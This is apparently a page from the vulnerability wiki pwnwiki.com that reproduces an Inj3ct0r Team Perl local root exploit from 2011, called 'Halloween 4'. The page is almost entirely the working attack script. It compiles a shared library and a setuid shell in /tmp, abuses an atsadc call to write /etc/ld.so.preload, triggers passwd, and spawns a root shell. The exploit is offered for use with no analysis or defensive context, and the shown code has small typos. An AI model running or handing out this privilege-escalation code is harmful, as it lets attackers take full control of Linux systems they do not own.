免费、自由、人人可编辑的漏洞库--pwnwiki.com
,
EXP
#!/usr/bin/perl
|| || | ||
o_,_7 _|| . _o_7 _|| 4_|_|| o_w_,
( : / (_) / ( .
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 + Site : 1337day.com 0
1 + Support e-mail : submitat1337day.com 1
0 0
1 ######################################### 1
0 I'm Angel Injection member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
"Halloween 4 local root Exploit"
"Coded By Angel Injection"
"Inj3ct0r Team FRI OCT 2011"
open O, ">/tmp/boom.c" or die "open(boom.c..)";
print O<<_EOF_;
#include <sys/types.h>
int time(void *v)
{
chown("/tmp/boomsh", 0, 0);
chmod("/tmp/boomsh", 06755);
unlink("/etc/ld.so.preload");
exit(1);
}
_EOF_
close O;
$foo = `cc -c -fPIC /tmp/boom.c -o /tmp/boom.o`;
$foo = `cc -shared /tmp/boom.o -o /tmp/boom.so`;
open O, ">/tmp/boomsh.c" or die "open(boomsh.c ...)";
print O<<_EOF2_;
#include <stdio.h>
int main()
{
char *a = {"/bin/sh", 0};
setuid(0); setregid(0, 0);
execve(a0, a, 0);
return 0;
}
_EOF2_
close O;
$foo = `cc /tmp/boomsh.c -o /tmp/boomsh`;
umask 0;
$foo = `atsadc 2 1 /etc/ld.so.preload`;
open O, ">/etc/ld.so.preload"
print O "/tmp/boom.so";
close O;
$foo = `/usr/bin/passwd`;
sleep 3;
system("/tmp/boomsh");
免费、自由、人人可编辑的漏洞库--pwnwiki.com
